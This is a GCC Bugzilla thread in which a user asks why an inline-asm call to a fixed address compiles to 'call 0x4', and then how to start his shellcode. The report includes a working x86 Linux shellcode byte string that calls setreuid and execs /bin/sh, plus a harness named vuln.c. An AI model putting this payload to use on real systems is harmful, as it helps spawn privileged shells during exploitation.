[Bug inline-asm/30002] New: Problem with call directive in inline ASM

2006-11-27 Thread blacklight86 at gmail dot com
Hi,

I've written this program to try a shellcode made by me:

char shell[] =
 "\xeb\x25\x5e\xb8\x46\x00\x00\x00"
 "\xbb\x00\x00\x00\x00\xb9\x00\x00"
 "\x00\x00\xcd\x80\xb8\x0b\x00\x00"
 "\x00\x89\xf3\x6a\x00\x56\x89\xe4"
 "\xba\x00\x00\x00\x00\xcd\x80\xe8"
 "\xd6\xff\xff\xff"
 "/bin/sh";

#include <stdio.h>

int main(void)  {
 printf ("%p\n",shell);
 __asm__("call 0x08049600");
 return 0;
}

Where, of course, 0x08049600 is the address of my shellcode.
But when I compile and run the program I get a segmentation fault.
This is what I get disassembling the program with Gdb:

0x080483a4 <main+0>:    push   %ebp
0x080483a5 <main+1>:    mov    %esp,%ebp
0x080483a7 <main+3>:    sub    $0x8,%esp
0x080483aa <main+6>:    and    $0xfffffff0,%esp
0x080483ad <main+9>:    mov    $0x0,%eax
0x080483b2 <main+14>:   add    $0xf,%eax
0x080483b5 <main+17>:   add    $0xf,%eax
0x080483b8 <main+20>:   shr    $0x4,%eax
0x080483bb <main+23>:   shl    $0x4,%eax
0x080483be <main+26>:   sub    %eax,%esp
0x080483c0 <main+28>:   sub    $0x8,%esp
0x080483c3 <main+31>:   push   $0x8049600
0x080483c8 <main+36>:   push   $0x80484e4
0x080483cd <main+41>:   call   0x80482b8 <printf@plt>
0x080483d2 <main+46>:   add    $0x10,%esp
0x080483d5 <main+49>:   call   0x4
0x080483da <main+54>:   leave
0x080483db <main+55>:   ret

Why do I have a call 0x4 on main+49 instead of call 0x08049600?


-- 
   Summary: Problem with call directive in inline ASM
   Product: gcc
   Version: 3.4.6
Status: UNCONFIRMED
  Severity: normal
  Priority: P3
 Component: inline-asm
    AssignedTo: unassigned at gcc dot gnu dot org
ReportedBy: blacklight86 at gmail dot com


http://gcc.gnu.org/bugzilla/show_bug.cgi?id=30002



[Bug inline-asm/30002] Problem with call directive in inline ASM

2006-11-28 Thread blacklight86 at gmail dot com


--- Comment #2 from blacklight86 at gmail dot com  2006-11-28 13:48 ---
This is what I do and what I get:

[EMAIL PROTECTED]:~/prog/shell$ gcc -o vuln vuln.c
[EMAIL PROTECTED]:~/prog/shell$ ./vuln
0x8049600
Segmentation fault

Where 0x8049600 is the address of my shellcode, obtained this way:

char shell[] =
 "\xeb\x25\x5e\xb8\x46\x00\x00\x00"
 "\xbb\x00\x00\x00\x00\xb9\x00\x00"
 "\x00\x00\xcd\x80\xb8\x0b\x00\x00"
 "\x00\x89\xf3\x6a\x00\x56\x89\xe4"
 "\xba\x00\x00\x00\x00\xcd\x80\xe8"
 "\xd6\xff\xff\xff"
 "/bin/sh";

#include <stdio.h>

int main(void)  {
 printf ("%p\n",shell);
 __asm__("call 0x8049600");
 return 0;
}

So I'm quite sure 0x8049600 is the REAL address of my shellcode. I guess it's
a linker problem... but why? The reference in the call is quite accurate, I
think...


-- 

blacklight86 at gmail dot com changed:

   What|Removed |Added

 Status|RESOLVED|UNCONFIRMED
 Resolution|INVALID |





[Bug inline-asm/30002] Problem with call directive in inline ASM

2006-11-28 Thread blacklight86 at gmail dot com


--- Comment #4 from blacklight86 at gmail dot com  2006-11-28 13:57 ---
How can I start the shellcode then?

